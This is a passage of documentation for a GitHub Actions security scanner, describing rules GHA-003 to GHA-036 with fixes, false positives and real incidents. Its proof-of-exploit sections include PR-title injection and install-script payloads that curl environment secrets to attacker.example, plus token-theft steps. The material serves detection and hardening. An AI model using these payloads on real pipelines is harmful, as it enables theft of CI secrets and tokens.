Recommendation. Pass untrusted values through an intermediate env: variable and reference that variable from the shell script. GitHub's expression evaluation happens before shell quoting, so inline ${{ github.event.* }} is always unsafe.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Seen in the wild.

  • GitHub Security Lab disclosure (2020): a sweep of public Actions found dozens of widely-used workflows interpolating github.event.issue.title / pull_request.title directly into shell. Any commenter or PR author could run arbitrary commands in the maintainer's CI.
  • Trail of Bits pwn-request research (2021): demonstrated the same primitive against pull_request_target workflows where the runner has secrets and a write-scope token; one fork PR could exfiltrate every secret the workflow could see. Mitigation is the same: never interpolate context into shell, route through env:.

Proof of exploit.

Vulnerable: PR title interpolated straight into shell.

name: triage on: pull_request_target: types: [opened, edited] jobs: greet: runs-on: ubuntu-latest steps: - run: | echo "New PR: ${{ github.event.pull_request.title }}"

Attack: open a PR with the title:

# foo"; curl -X POST https://attacker.example/exfil \

-d "$(env | base64 -w0)"; echo "

GitHub expands ${{ ... }} BEFORE shell quoting, so the

title's " closes the echo string and the rest of the line

becomes shell. The pull_request_target trigger means the

runner already has secrets and a write-scope GITHUB_TOKEN,

so the curl exfils every secret the workflow can see.

Safe: route through env so the value is never interpolated

into the shell template:

  - env:
      PR_TITLE: ${{ github.event.pull_request.title }}
    run: |
      echo "New PR: $PR_TITLE"

Source: GHA-003 in the GitHub Actions provider.

GHA-004: Workflow has no explicit permissions block MEDIUM 🔧 fix

Evidences: CICD-SEC-5 Insufficient PBAC.

How this is detected. Without an explicit permissions: block (either top-level or per-job), the GITHUB_TOKEN inherits the repository's default scope, typically write. A compromised step receives far more privilege than it needs.

Recommendation. Add a top-level permissions: block (start with contents: read) and grant additional scopes only on the specific jobs that need them.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Read-only / lint-only workflows that do not call any write-scoped API often pass without an explicit block because the default token scope on public repos is read. The rule defaults to MEDIUM confidence to reflect this.

Source: GHA-004 in the GitHub Actions provider.

GHA-005: AWS auth uses long-lived access keys MEDIUM 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Long-lived AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY secrets in GitHub Actions can't be rotated on a fine-grained schedule and remain valid until manually revoked. OIDC with role-to-assume yields short-lived credentials per workflow run.

Recommendation. Use aws-actions/configure-aws-credentials with role-to-assume + permissions: id-token: write to obtain short-lived credentials via OIDC. Remove the static AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY secrets.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • LocalStack and Moto integration tests set AWS_ENDPOINT_URL to a localhost address and use the sentinel test / test access keys (the LocalStack convention). Those values can't authenticate against real AWS, so the rule auto-suppresses an env block that pairs a localhost endpoint with sentinel keys.

Source: GHA-005 in the GitHub Actions provider.

GHA-006: Artifacts not signed (no cosign/sigstore step) MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Unsigned artifacts cannot be verified downstream, so a tampered build is indistinguishable from a legitimate one. The check recognizes cosign, sigstore, slsa-github-generator, slsa-framework, and notation-sign as signing tools.

Recommendation. Add a signing step, e.g. sigstore/cosign-installer followed by cosign sign, or slsa-framework/slsa-github-generator for keyless SLSA provenance. Publish the signature alongside the artifact and verify it at consumption time.

Seen in the wild.

  • SolarWinds Orion compromise (December 2020): SUNBURST trojanized builds shipped to ~18,000 customers because no post-build signature could be checked against a trusted signing identity. Cryptographic signing on every release would have given downstream consumers a verifiable break with the upstream key, the absence of which was the ambient signal of compromise.
  • PyTorch nightly compromise (December 2022): the torchtriton dependency was hijacked via PyPI dependency-confusion. Sigstore-style attestation tied to the official publisher would have made the impostor build fail verification rather than silently install.

Source: GHA-006 in the GitHub Actions provider.

GHA-007: SBOM not produced (no CycloneDX/syft/Trivy-SBOM step) MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Without an SBOM, downstream consumers cannot audit the exact set of dependencies shipped in the artifact, delaying vulnerability response when a transitive dep is disclosed. The check recognises CycloneDX, syft, Anchore SBOM action, spdx-sbom-generator, Microsoft sbom-tool, and Trivy in SBOM mode.

Recommendation. Add an SBOM generation step, anchore/sbom-action, syft . -o cyclonedx-json, Trivy with --format cyclonedx, or Microsoft's sbom-tool. Attach the SBOM to the release so consumers can ingest it into their vuln-management pipeline.

Source: GHA-007 in the GitHub Actions provider.

GHA-008: Credential-shaped literal in workflow body CRITICAL 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Every string in the workflow is scanned against a set of credential patterns (AWS access keys, GitHub tokens, Slack tokens, JWTs, Stripe, Google, Anthropic, etc., see --man secrets for the full catalog). A match means a secret was pasted into YAML, the value is visible in every fork and every build log and must be treated as compromised.

Recommendation. Rotate the exposed credential immediately. Move the value to an encrypted repository or environment secret and reference it via ${{ secrets.NAME }}. For cloud access, prefer OIDC federation over long-lived keys.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Test fixtures and documentation blobs sometimes embed credential-shaped strings (JWT samples, AKIAI... examples). The AWS canonical example AKIAIOSFODNN7EXAMPLE is deliberately NOT suppressed, if it appears in a real workflow it almost always means a copy-paste from docs was never substituted. Defaults to LOW confidence.

Seen in the wild.

  • Uber 2016 GitHub leak: an AWS access key embedded in a private GitHub repo was reachable to attackers who got at the repo and used it to download driver / rider PII for 57 million accounts. Credential-shaped literals in any source control system (public or private) are one credential-leak away from the same outcome.
  • GitGuardian's annual State of Secrets Sprawl reports consistently find millions of fresh credential leaks per year across public commits, with a median time-to-revocation after disclosure of days, not minutes. Pinning secrets to ${{ secrets.* }} removes the artifact from source control entirely.

Proof of exploit.

Vulnerable: AWS access key pasted into the workflow body.

env: AWS_ACCESS_KEY_ID: AKIAIOSFODNN7EXAMPLE AWS_SECRET_ACCESS_KEY: wJalrXUtnnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY

Attack chain:

1. Attacker clones/forks the repo or pulls from a public

mirror. The literal is in plain text — no credentials

needed to read it.

2. Attacker uses the key against the AWS account it

belongs to. With AmazonEC2FullAccess this is

immediate compute hijack; with broader IAM it is

full data exfiltration.

3. Even after rotation, every git revision and every

CI build log retains the value — pull-request

mirrors, logging back-ends, and forks all have to

be scrubbed.

Safe: reference a stored secret. The value never lives in

source control or build logs (GitHub redacts it from output).

env: AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }} AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}

Better: use OIDC federation. No long-lived key exists.

permissions: id-token: write steps: - uses: aws-actions/configure-aws-credentials@ with: role-to-assume: arn:aws:iam::123456789012:role/CIRole aws-region: us-east-1

Source: GHA-008 in the GitHub Actions provider.

GHA-009: workflow_run downloads upstream artifact unverified CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. on: workflow_run runs in the privileged context of the default branch (write GITHUB_TOKEN, secrets accessible) but consumes artifacts produced by the triggering workflow, which is often a fork PR with no trust boundary. Classic PPE: a malicious PR uploads a tampered artifact, the privileged workflow_run downloads and executes it.

Recommendation. Add a verification step BEFORE consuming the artifact: cosign verify-attestation --type slsaprovenance ..., gh attestation verify --owner $OWNER ./artifact, or publish a checksum manifest from the trusted producer and sha256sum -c it. Treat any download from a fork as untrusted input.

Source: GHA-009 in the GitHub Actions provider.

GHA-010: Local action (./path) on untrusted-trigger workflow HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. uses: ./path/to/action resolves the action against the CHECKED-OUT workspace. On pull_request_target / workflow_run, that workspace can be PR-controlled, meaning the attacker supplies the action.yml that runs with default-branch privilege.

Recommendation. Move the action to a separate repo under your control and reference it by SHA-pinned uses: org/repo@<sha>, or split the workflow so the privileged work runs only on pull_request (read-only token, no secrets) where PR-controlled action.yml can't escalate.

Source: GHA-010 in the GitHub Actions provider.

GHA-011: Cache key derives from attacker-controllable input MEDIUM

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. actions/cache restores by key (and falls through restore-keys on miss). When the key includes a value the attacker controls (PR title, head ref, workflow_dispatch input), an attacker can plant a poisoned cache entry that a later default-branch run restores and treats as a clean build cache.

Recommendation. Build the cache key from values the attacker can't control: ${{ runner.os }}, ${{ hashFiles('**/*.lock') }} (only when the lockfile is enforced by branch protection), and the workflow file path. Never include github.event.* PR/issue fields, github.head_ref, or inputs.* in the key namespace.

Source: GHA-011 in the GitHub Actions provider.

GHA-012: Self-hosted runner without ephemeral marker MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Self-hosted runners that don't tear down between jobs leak filesystem and process state. A PR-triggered job writes to /tmp; a subsequent prod-deploy job on the same runner reads it. The mitigation is the runner's --ephemeral mode, the runner exits after one job and re-registers fresh. The check looks for an ephemeral label on the runs-on value; without one, the runner is presumed reusable. Recognises all three runs-on shapes: string, list, and { group, labels } dict form.

Recommendation. Configure the self-hosted runner to register with --ephemeral (the runner exits after one job and is freshly registered), and add an ephemeral label so this check can verify it. Consider actions-runner-controller for ephemeral pools.

Known false positives.

  • Organisations using actions-runner-controller (ARC), autoscaled pools, or vendor runner fleets often use labels like arc-*, autoscaled-*, or ephemeral-pool-* instead of a bare ephemeral label. The check only matches the literal ephemeral token on runs-on; extend via a custom allow-prefix config if your fleet uses a different naming convention. Defaults to MEDIUM confidence.

Source: GHA-012 in the GitHub Actions provider.

GHA-013: issue_comment trigger without author guard HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. on: issue_comment (and discussion_comment) fires for every comment on every issue or discussion in the repository. On public repos this means any GitHub user can trigger workflow execution. If the workflow runs commands, deploys, or accesses secrets, the attacker controls timing and can inject payloads through the comment body.

Recommendation. Add an if: condition that checks github.event.comment.author_association (e.g. contains('OWNER MEMBER COLLABORATOR', ...)), github.event.sender.login, or github.actor against an allowlist. Without a guard, any GitHub user can trigger the workflow by posting a comment.

Source: GHA-013 in the GitHub Actions provider.

GHA-014: Deploy job missing environment binding MEDIUM 🔧 fix

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Without an environment: binding, a deploy job can't be gated by required reviewers, deployment-branch policies, or wait timers. Any push to the triggering branch will deploy immediately.

Recommendation. Add environment: <name> to jobs that deploy. Configure required reviewers, wait timers, and branch-protection rules on the matching GitHub environment.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Integration-test jobs that run terraform apply or kubectl apply against a local mock (LocalStack, Moto, kind, k3d) aren't real deploys. The rule auto-suppresses a step whose env carries AWS_ENDPOINT_URL or KUBE_API_URL pointing at a localhost address.

Source: GHA-014 in the GitHub Actions provider.

GHA-015: Job has no timeout-minutes, unbounded build MEDIUM 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Without timeout-minutes, the job runs until GitHub's 6-hour default kills it. Explicit timeouts cap blast radius, cost, and the window during which a compromised step has access to secrets.

Recommendation. Add timeout-minutes: to each job, sized to the 95th percentile of historical runtime plus margin. GitHub's default is 360 minutes, an explicitly shorter value limits blast radius and runner cost.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GHA-015 in the GitHub Actions provider.

GHA-016: Remote script piped to shell interpreter HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects curl | bash, wget | sh, and similar patterns that pipe remote content directly into a shell interpreter inside a workflow. An attacker who controls the remote endpoint (or poisons DNS / CDN) gains arbitrary code execution in the CI runner.

Recommendation. Download the script to a file, verify its checksum, then execute it. Or vendor the script into the repository.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Established vendor installers (get.docker.com, sh.rustup.rs, bun.sh/install, awscli.amazonaws.com, cli.github.com, ...) ship via HTTPS from their own CDN and are idiomatic. This rule defaults to LOW confidence so CI gates can ignore them with --min-confidence MEDIUM; the finding still surfaces so teams that want cryptographic verification can audit.

Seen in the wild.

  • Codecov Bash uploader compromise (April 2021): an attacker modified the codecov.io/bash uploader script (commonly fetched via curl -s codecov.io/bash | bash) to exfiltrate environment variables from CI runners (AWS keys, GitHub tokens, signing keys) at thousands of customers for over two months before discovery.
  • Bitwarden / npm install scripts (CVE-2018-7536-class incidents): remote-script execution in CI is the same primitive. The attacker controls bytes the runner executes. Pinning a digest or hosting a vendored copy turns a perpetual ambient risk into a one-time review.

Proof of exploit.

Vulnerable: install script piped straight to bash.

steps: - run: curl -sL https://example.com/install.sh | bash

Attack: an attacker who controls the install.sh endpoint

(compromised CDN, expired domain, BGP hijack, account

takeover, or simply being the upstream maintainer with bad

intent) drops a payload that runs in the CI runner with

every secret available to the job:

#!/usr/bin/env bash

# legitimate-looking install actions...

# curl -X POST https://attacker.example/exfil \

-d "$(env)" -d "$(cat $GITHUB_TOKEN_FILE 2>/dev/null)"

The runner has no way to know the bytes changed.

Safe: download, verify a known-good digest, then execute.

steps: - run: | curl -sLo install.sh https://example.com/install.sh echo "abc123...expected_sha256 install.sh" | sha256sum -c bash install.sh

Source: GHA-016 in the GitHub Actions provider.

GHA-017: Docker run with insecure flags (privileged/host mount) CRITICAL 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Flags like --privileged, --cap-add, --net=host, or host-root volume mounts (-v /:/) in a workflow give the container full access to the runner, enabling container escape and lateral movement.

Recommendation. Remove --privileged and --cap-add flags. Use minimal volume mounts. Prefer rootless containers.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GHA-017 in the GitHub Actions provider.

GHA-018: Package install from insecure source HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects package-manager invocations that use plain HTTP registries (--index-url http://, --registry=http://) or disable TLS verification (--trusted-host, --no-verify) in a workflow. These patterns allow man-in-the-middle injection of malicious packages.

Recommendation. Use HTTPS registry URLs. Remove --trusted-host and --no-verify flags. Pin to a private registry with TLS.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GHA-018 in the GitHub Actions provider.

GHA-019: GITHUB_TOKEN written to persistent storage CRITICAL 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Detects patterns where GITHUB_TOKEN is written to files, environment files ($GITHUB_ENV), or piped through tee. Persisted tokens survive the step boundary and can be exfiltrated by later steps, uploaded artifacts, or cache entries, turning a scoped credential into a long-lived one.

Recommendation. Never write GITHUB_TOKEN to files, artifacts, or GITHUB_ENV. Use the token inline via ${{ secrets.GITHUB_TOKEN }} in the step that needs it.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Proof of exploit.

Vulnerable: token written to a file that survives the

step boundary and lands in the upload-artifact bundle.

jobs: build: permissions: { contents: write, packages: write } steps: - run: echo "${{ secrets.GITHUB_TOKEN }}" > /tmp/token - run: make build # writes /tmp/token # into ./dist/ - uses: actions/upload-artifact@ with: name: build-output path: dist/

Attack: any contributor (or, on public repos, anyone)

downloads the artifact:

gh run download -n build-output

cat build-output/tmp/token # full GITHUB_TOKEN

The token is scoped to the workflow's permissions block —

in this case write to contents and packages,

enough to push tampered binaries to GHCR or rewrite the

branch the workflow runs on. Composes with SCM-001

(unprotected default branch) into XPC-004's "open a PR,

fetch artifact, ship malicious binary" loop.

Other persistence patterns the rule catches:

echo "TOKEN=$GITHUB_TOKEN" >> $GITHUB_ENV

echo "::set-output name=tok::$GITHUB_TOKEN"

echo "$SECRET" | tee /tmp/cache/secret

Safe: use the token inline in the step that needs it; never

write it anywhere that survives the step's environment:

  - run: gh release create v1.0.0 dist/*
    env:
      GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}

Source: GHA-019 in the GitHub Actions provider.

GHA-020: No vulnerability scanning step MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Without a vulnerability scanning step, known-vulnerable dependencies ship to production undetected. The check recognises trivy, grype, snyk, npm audit, yarn audit, safety check, pip-audit, osv-scanner, and govulncheck.

Recommendation. Add a vulnerability scanning step, trivy, grype, snyk test, npm audit, pip-audit, or osv-scanner. Publish results so vulnerabilities surface before deployment.

Source: GHA-020 in the GitHub Actions provider.

GHA-021: Package install without lockfile enforcement MEDIUM 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects package-manager install commands that do not enforce a lockfile or hash verification. Without lockfile enforcement the resolver pulls whatever version is currently latest, exactly the window a supply-chain attacker exploits.

Recommendation. Use lockfile-enforcing install commands: npm ci instead of npm install, pip install --require-hashes -r requirements.txt, yarn install --frozen-lockfile, bundle install --frozen, and go install tool@v1.2.3.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GHA-021 in the GitHub Actions provider.

GHA-022: Dependency update command bypasses lockfile pins MEDIUM 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects pip install --upgrade, npm update, yarn upgrade, bundle update, cargo update, go get -u, and composer update. These commands bypass lockfile pins and pull whatever version is currently latest. Tooling upgrades (pip install --upgrade pip) are exempted.

Recommendation. Remove dependency-update commands from CI. Use lockfile-pinned install commands (npm ci, pip install -r requirements.txt) and update dependencies via a dedicated PR workflow (e.g. Dependabot, Renovate).

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Common build-tool bootstrapping idioms (pip install --upgrade pip, pip install --upgrade setuptools wheel virtualenv) and security-tool installs (pip install --upgrade pip-audit / cyclonedx-bom / semgrep) are exempted by the DEP_UPDATE_RE tooling allowlist. Other tooling-upgrade idioms not yet on the list can still trip the rule. Defaults to MEDIUM confidence so CI gates can require --min-confidence HIGH to ignore.

Source: GHA-022 in the GitHub Actions provider.

GHA-023: TLS / certificate verification bypass HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects patterns that disable TLS certificate verification: git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, curl -k, wget --no-check-certificate, PYTHONHTTPSVERIFY=0, and GOINSECURE=. Disabling TLS verification allows MITM injection of malicious packages, repositories, or build tools.

Recommendation. Remove TLS verification bypasses. Fix certificate issues at the source (install CA certificates, configure proper trust stores) instead of disabling verification.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GHA-023 in the GitHub Actions provider.

GHA-024: No SLSA provenance attestation produced MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Provenance generation is distinct from signing. A signed artifact proves who published it; a provenance attestation proves where/how it was built. Consumers can then verify the build happened on a trusted runner, from a specific source commit, with known parameters. Without it, a leaked signing key forges identity but a leaked build environment also forges provenance. You need both for the SLSA L3 non-falsifiability guarantee.

Recommendation. Call slsa-framework/slsa-github-generator or actions/attest-build-provenance after the build step to emit an in-toto attestation alongside the artifact. cosign sign alone (covered by GHA-006) signs the artifact but doesn't record how it was built. SLSA Build L3 requires the provenance statement.

Source: GHA-024 in the GitHub Actions provider.

GHA-025: Reusable workflow not pinned to commit SHA HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. A reusable workflow runs with the caller's GITHUB_TOKEN and secrets by default. If uses: org/repo/.github/workflows/release.yml@v1 resolves to an attacker-modified commit, their code executes with your repository's permissions. This is the same threat model as unpinned step actions (GHA-001) but over a different uses: surface.

Recommendation. Pin every jobs.<id>.uses: reference to a 40-char commit SHA (owner/repo/.github/workflows/foo.yml@<sha>). Tag refs (@v1, @main) can be silently repointed by whoever controls the callee repository.

Source: GHA-025 in the GitHub Actions provider.

GHA-026: Container job disables isolation via options: HIGH

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. GitHub-hosted runners execute container: jobs inside a Docker container the runner itself manages, normally a hardened, network-namespaced sandbox. options: is a free-text passthrough to docker run; a flag that breaks the sandbox (shares host network/PID, runs privileged, maps the Docker socket) turns the job into an RCE on the runner VM.

Recommendation. Remove --network host, --privileged, --cap-add, --user 0/--user root, --pid host, --ipc host, and host -v bind-mounts from container.options and services.*.options. If a build genuinely needs one of these, move it to a dedicated self-hosted pool with branch protection so the flag doesn't reach PR runs.

Source: GHA-026 in the GitHub Actions provider.

GHA-027: Workflow contains indicators of malicious activity CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution, CICD-SEC-7 Insecure System Configuration.

How this is detected. Distinct from the hygiene checks. GHA-016 flags curl | bash as a risky default; this rule fires only on concrete indicators, reverse shells, base64-decoded execution, known miner binaries or pool URLs, exfil-channel domains, credential-dump pipes, history-erasure commands. Categories reported: obfuscated-exec, reverse-shell, crypto-miner, exfil-channel, credential-exfil, audit-erasure.

Recommendation. Treat this as a potential pipeline compromise. Inspect the matching step(s), identify the author and the PR that introduced them, rotate any credentials the workflow has access to, and audit CloudTrail/AuditLogs for exfil. If the match is a legitimate red-team exercise, whitelist via .pipelinecheckignore with an expires: date, never a permanent suppression.

Known false positives.

  • Security-training repositories, CTF challenges, and red-team exercise workflows legitimately contain reverse-shell strings or exfil domains as literals. Matches inside YAML keys / HCL attributes whose names contain example, fixture, sample, demo, or test are auto-suppressed; bare lines in a production workflow still fire.
  • Defaults to LOW confidence. Filter with --min-confidence MEDIUM to ignore all matches; the rule still surfaces the hit for teams that want to spot-check.

Source: GHA-027 in the GitHub Actions provider.

GHA-028: Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. eval, sh -c "$X", and `$X` all re-parse the variable's value as shell syntax. If the value contains ;, &&, |, backticks, or $(), those metacharacters execute. Even when the variable source looks controlled today, relocating the script or adding a new caller can silently expose it to untrusted input.

Recommendation. Replace eval "$VAR" / sh -c "$VAR" / backtick exec of variables with direct command invocation. If the command really must be dynamic, pass arguments as array members ("${ARGS[@]}") or validate the input against an allow-list before invocation.

Known false positives.

  • eval "$(ssh-agent -s)" and similar eval "$(<literal-tool> <literal-args>)" bootstrap idioms are intentionally NOT flagged, the substituted command is literal, only its output is eval'd. The rule only fires when the substituted command references a variable.

Source: GHA-028 in the GitHub Actions provider.

GHA-029: Package install bypasses registry integrity (git / path / tarball source) MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Package installs that pull from git+… without a pinned commit, from a local path (./dir, file:…, absolute paths), or from a direct tarball URL are invisible to the normal lockfile integrity controls. A moving branch head, a sibling checkout the build assumes exists, or a tarball whose hash isn't verified all give an attacker who controls any of those surfaces the ability to substitute code into the build.

Recommendation. Pin git dependencies to a commit SHA (pip install git+https://…/repo@<sha>, cargo install --git … --rev <sha>). Publish private packages to an internal registry instead of installing from a filesystem path or tarball URL.

Source: GHA-029 in the GitHub Actions provider.

GHA-030: OIDC token requested without environment-protected job HIGH

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. Pairs with IAM-008. IAM-008 verifies the AWS-side trust policy pins audience + subject; this rule verifies the GitHub-side workflow can't request the token from any branch without a deployment gate. A misconfiguration on either side defeats the OIDC story.

Recommendation. Bind every job that exchanges the GHA OIDC token for cloud credentials to a protected environment: (e.g. environment: production). Environment protections layer in branch restrictions, required reviewers, and deployment windows that the IdP-side trust policy cannot enforce alone.

Source: GHA-030 in the GitHub Actions provider.

GHA-031: Workflow uses retired set-output / save-state command HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. GitHub deprecated ::set-output:: and ::save-state:: in October 2022 because they read from the runner's stdout as a control channel. Any tool whose output happens to contain ::set-output… (a CI job's own diagnostic, a downloaded log, an upstream test framework) silently sets a step output. The replacement workflow commands ($GITHUB_OUTPUT / $GITHUB_STATE files) close that injection channel. Workflows still using the retired commands also depend on a deprecation timer that GitHub has extended several times. They will eventually break.

Recommendation. Replace echo "::set-output name=X::$VALUE" with echo "X=$VALUE" >> "$GITHUB_OUTPUT" and echo "::save-state name=X::$VALUE" with echo "X=$VALUE" >> "$GITHUB_STATE". The old commands stream through the runner's stdout, which lets any log line that happens to start with :: inject into the command channel. The file-redirect forms write to a private file the runner reads after the step exits, no log-line interleaving, no injection.

Source: GHA-031 in the GitHub Actions provider.

GHA-032: run: invokes local script on untrusted-trigger workflow CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. GHA-010 flags uses: ./action, the action form of the same threat. This rule extends to direct shell invocation: run: ./scripts/setup.sh / run: bash scripts/setup.sh / run: python tools/build.py resolve against the checked-out workspace, which on pull_request_target / workflow_run is PR-controlled. The attacker ships an edited script and gets a default-branch-privileged shell.

Recommendation. Either don't run the script under an untrusted trigger, or split the workflow: keep the privileged work on the default branch (push / release triggers, no PR fork content), and run untrusted-trigger steps in a separate workflow with no secrets and a minimal GITHUB_TOKEN scope. Pinning the script via uses: org/repo@<sha> from a separate trusted repo is the canonical fix.

Source: GHA-032 in the GitHub Actions provider.

GHA-033: Secret value echoed / printed in a run: block CRITICAL

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Two distinct shapes are flagged: (1) printing a secret context expression directly, e.g. echo "${{ secrets.X }}" or cat <<<${{ secrets.X }}; (2) printing an env var whose value comes from a secret, when the surrounding step's env: declares it as X: ${{ secrets.X }}. The first is the obvious foot-gun; the second is the indirect form that slips past lint passes that only scan for ${{ secrets...}} literals.

Recommendation. Don't print secret values from a script. GitHub's log redaction is a best-effort string match. It doesn't catch base64 / urlencoded / partial substrings, and any caller that retrieves the raw log via the API gets the unredacted stream. If you need to confirm the secret exists, log a boolean ([ -n "$X" ] && echo set || echo unset) or a fingerprint (echo "$X" | sha256sum | head -c8), never the value itself.

Source: GHA-033 in the GitHub Actions provider.

GHA-034: Reusable workflow called with secrets: inherit MEDIUM 🔧 fix

Evidences: CICD-SEC-2 Inadequate Identity and Access Management, CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Fires on a jobs.<id>.uses: ... reference whose sibling secrets: value is the literal string inherit. This is distinct from GHA-025 (which gates on the pin of the called workflow): inheritance is a problem even when the call is SHA-pinned, because the surface a compromised callee sees is every caller secret instead of just the named ones. Explicit lists also document the contract, reviewers see exactly which secrets cross the workflow boundary.

Recommendation. Replace secrets: inherit with an explicit list of just the secrets the called workflow actually needs (secrets: { NPM_TOKEN: ${{ secrets.NPM_TOKEN }} }). inherit passes every secret the caller can see, including ones the downstream workflow has no business reading. A compromised or buggy reusable workflow can then exfiltrate credentials the caller never intended to share.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Single-tenant repos that share their entire secrets set with every reusable workflow by policy. Rare in practice, explicit lists make the secret flow visible and don't add much typing. Suppress with .pipelinecheckignore and a rationale rather than disabling the rule everywhere.

Source: GHA-034 in the GitHub Actions provider.

GHA-035: github-script step interpolates untrusted context HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. GHA-003 covers run: blocks where shell expansion is the injection surface. actions/github-script@<ref> runs the script: input as Node.js inside an authenticated Octokit context, same threat model, different language. The rule fires when script: (or the legacy previews: companion for inline JS) contains a ${{ github.event.* }}, ${{ inputs.* }}, ${{ github.head_ref }}, ${{ github.ref_name }}, or any other untrusted context expression, exactly the same catalog GHA-003 uses.

Recommendation. Pass attacker-controllable values through env: and read them inside the script via process.env.X instead of interpolating ${{ ... }} directly into the script body. GitHub expands the expression before the JavaScript engine parses the source, so backticks, quotes, and ${...} characters in the source field break out of the surrounding string and execute as JavaScript with the workflow's GITHUB_TOKEN in scope.

Known false positives.

  • Scripts that interpolate ${{ steps.*.outputs.* }} from a trusted upstream step are out of scope (the rule only matches the curated untrusted-context regex). If you intentionally rely on a non-curated context, suppress with a brief .pipelinecheckignore rationale.

Source: GHA-035 in the GitHub Actions provider.

GHA-036: runs-on interpolates untrusted context HIGH 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

